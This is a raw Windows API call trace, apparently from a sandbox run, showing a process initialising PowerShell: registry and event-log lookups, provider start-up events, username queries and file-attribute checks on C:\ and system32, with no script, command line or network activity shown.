	[0649.679] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x384) returned 0x0
	[0649.679] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
	[0649.679] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x388) returned 0x0
	[0649.679] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
	[0649.679] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x38c) returned 0x0
	[0649.679] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
	[0649.679] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x390) returned 0x0
	[0649.680] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
	[0649.680] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x394) returned 0x0
	[0649.680] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
	[0649.680] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x398) returned 0x0
	[0649.680] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
	[0649.680] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x39c) returned 0x0
	[0649.680] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
	[0649.680] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x3a0) returned 0x0
	[0649.681] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x3a4) returned 0x0
	[0649.681] RegCloseKey (hKey=0x3a4) returned 0x0
	[0649.681] RegCloseKey (hKey=0x380) returned 0x0
	[0649.681] RegCloseKey (hKey=0x3a0) returned 0x0
	[0649.686] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b950008
	[0650.076] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f03e48*="WSMan", lpRawData=0x2f03bb8) returned 1
	[0650.082] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0650.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.082] CoTaskMemFree (pv=0x1a9d20) 
	[0650.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.085] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0650.085] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0650.085] CoTaskMemFree (pv=0x1b880b60) 
	[0650.085] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0650.085] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0650.086] CoTaskMemFree (pv=0x1f1ef0) 
	[0650.086] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f09380*="Alias", lpRawData=0x2f09110) returned 1
	[0650.093] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0650.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.093] CoTaskMemFree (pv=0x1a9d20) 
	[0650.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.096] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0650.096] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0650.096] CoTaskMemFree (pv=0x1b880b60) 
	[0650.096] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0650.096] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0650.096] CoTaskMemFree (pv=0x1f1ef0) 
	[0650.097] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0e978*="Environment", lpRawData=0x2f0e708) returned 1
	[0650.114] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0650.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.114] CoTaskMemFree (pv=0x1a9d20) 
	[0650.115] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0650.115] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0650.115] CoTaskMemFree (pv=0x1a9d20) 
	[0650.115] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0650.116] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0650.116] CoTaskMemFree (pv=0x1a9d20) 
	[0650.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0650.116] SetErrorMode (uMode=0x1) returned 0x1
	[0650.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d140 | out: lpFileInformation=0x16d140*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.116] SetErrorMode (uMode=0x1) returned 0x1
	[0650.118] GetLogicalDrives () returned 0x4
	[0650.118] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.119] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.119] SetErrorMode (uMode=0x1) returned 0x1
	[0650.120] CoTaskMemAlloc (cb=0x68) returned 0x26f780
	[0650.120] CoTaskMemAlloc (cb=0x68) returned 0x26fbe0
	[0650.121] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f780, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d110, lpMaximumComponentLength=0x16d10c, lpFileSystemFlags=0x16d108, lpFileSystemNameBuffer=0x26fbe0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d110*=0x9c354b42, lpMaximumComponentLength=0x16d10c*=0xff, lpFileSystemFlags=0x16d108*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0650.121] CoTaskMemFree (pv=0x26f780) 
	[0650.121] CoTaskMemFree (pv=0x26fbe0) 
	[0650.121] SetErrorMode (uMode=0x1) returned 0x1
	[0650.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.122] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.122] SetErrorMode (uMode=0x1) returned 0x1
	[0650.122] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.123] SetErrorMode (uMode=0x1) returned 0x1
	[0650.123] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.123] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cd00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.123] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.123] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cc30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.124] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.124] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.124] SetErrorMode (uMode=0x1) returned 0x1
	[0650.124] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cee0 | out: lpFileInformation=0x16cee0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.125] SetErrorMode (uMode=0x1) returned 0x1
	[0650.125] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.125] SetErrorMode (uMode=0x1) returned 0x1
	[0650.125] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cee0 | out: lpFileInformation=0x16cee0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.125] SetErrorMode (uMode=0x1) returned 0x1
	[0650.125] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.125] SetErrorMode (uMode=0x1) returned 0x1
	[0650.125] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.126] SetErrorMode (uMode=0x1) returned 0x1
	[0650.126] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0650.126] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0650.127] CoTaskMemFree (pv=0x1b880b60) 
	[0650.127] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0650.127] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0650.128] CoTaskMemFree (pv=0x1f1ef0) 
	[0650.128] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f15a68*="FileSystem", lpRawData=0x2f157f8) returned 1
	[0650.135] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0650.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.135] CoTaskMemFree (pv=0x1a9d20) 
	[0650.135] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0650.135] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0650.136] CoTaskMemFree (pv=0x1b880b60) 
	[0650.136] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0650.136] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0650.136] CoTaskMemFree (pv=0x1f1ef0) 
	[0650.136] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f1b2a8*="Function", lpRawData=0x2f1b038) returned 1
	[0650.137] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0650.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.137] CoTaskMemFree (pv=0x1a9d20) 
	[0651.594] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0651.594] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0651.595] CoTaskMemFree (pv=0x1b880b60) 
	[0651.595] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0651.595] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0651.595] CoTaskMemFree (pv=0x1f1ef0) 
	[0651.595] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3dad0*="Registry", lpRawData=0x2f3d860) returned 1
	[0653.220] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0653.220] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0653.220] CoTaskMemFree (pv=0x1b880b60) 
	[0653.220] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0653.220] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0653.220] CoTaskMemFree (pv=0x1f1ef0) 
	[0653.221] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f42ee8*="Variable", lpRawData=0x2f42c78) returned 1
	[0653.228] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0653.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.228] CoTaskMemFree (pv=0x1a9d20) 
	[0653.228] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0653.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.228] CoTaskMemFree (pv=0x1a9d20) 
	[0653.262] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0653.262] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0654.743] CoTaskMemFree (pv=0x1b880b60) 
	[0654.743] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0654.743] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0654.743] CoTaskMemFree (pv=0x1f1ef0) 
	[0654.744] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f56b00*="Certificate", lpRawData=0x2f56890) returned 1
	[0656.549] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0656.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.549] CoTaskMemFree (pv=0x1a9d20) 
	[0656.552] GetLogicalDrives () returned 0x4
	[0656.552] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0656.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0656.554] CoTaskMemAlloc (cb=0x20e) returned 0x244ae0
	[0656.554] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x244ae0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0656.554] CoTaskMemFree (pv=0x244ae0) 
	[0656.555] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0656.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.555] CoTaskMemFree (pv=0x1a9d20) 
	[0656.556] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0656.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.556] CoTaskMemFree (pv=0x1a9d20) 
	[0656.573] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0656.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.573] CoTaskMemFree (pv=0x1a9d20) 
	[0656.574] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0656.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.575] CoTaskMemFree (pv=0x1a9d20) 
	[0656.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0656.575] SetErrorMode (uMode=0x1) returned 0x1
	[0656.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16cfd0 | out: lpFileInformation=0x16cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0656.576] SetErrorMode (uMode=0x1) returned 0x1
	[0656.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.339] SetErrorMode (uMode=0x1) returned 0x1
	[0658.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16cfd0 | out: lpFileInformation=0x16cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0658.339] SetErrorMode (uMode=0x1) returned 0x1
	[0658.339] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0658.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.340] CoTaskMemFree (pv=0x1a9d20) 
	[0658.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.346] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0658.346] SetErrorMode (uMode=0x1) returned 0x1
	[0658.346] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cf90 | out: lpFileInformation=0x16cf90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0658.346] SetErrorMode (uMode=0x1) returned 0x1
	[0658.346] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0658.346] SetErrorMode (uMode=0x1) returned 0x1
	[0658.347] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cf90 | out: lpFileInformation=0x16cf90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0658.347] SetErrorMode (uMode=0x1) returned 0x1
	[0658.347] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cd90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0658.347] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0658.347] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.347] SetErrorMode (uMode=0x1) returned 0x1
